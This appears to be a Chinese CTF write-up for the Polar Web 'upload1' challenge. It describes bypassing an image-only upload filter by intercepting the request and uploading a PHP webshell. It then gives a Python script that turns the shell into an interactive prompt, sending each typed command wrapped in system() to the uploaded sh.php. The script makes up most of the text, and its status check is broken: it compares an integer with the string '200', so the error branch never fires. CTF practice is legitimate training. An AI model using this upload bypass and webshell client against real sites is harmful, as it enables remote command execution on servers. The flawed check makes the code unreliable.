Polar Web【简单】upload1

思路

本题思路同之前两篇文中的文件上传题目性质相同，这里再次记录，旨在改良之前的脚本编写方式 —— 脚本运行后变为可交互的命令行形式。

1. 打开环境，见要求上传文件，且类型仅为图片类型，因此仍然使用截取数据包的方式修改重发。
2. 修改数据为木马后重发，未发生其他过滤，上传成功。
3. 下文呈现可交互式脚本的基本逻辑，以供参考。

EXP

import requests


def attack(url, cmd):
    data = {
        "cmd": cmd
    }
    resp = requests.post(url=url, data=data)
    if not resp.status_code != '200':
        print("No response...")
        return
    print(resp.text)


if __name__ == '__main__':
    while True:
        u = 'http://~.www.polarctf.com:8090/uploads/sh.php'
        command = input('>> ')
        if command == 'quit':
            break
        command = 'system("' + command + '");'
        attack(u, command)

运行&总结

• 重新尝试同类型的题目，通过本题改良了先前的Webshell连接脚本，使得运行后可操作性更强
  
  
  
  
  
  
  

敬，不完美的明天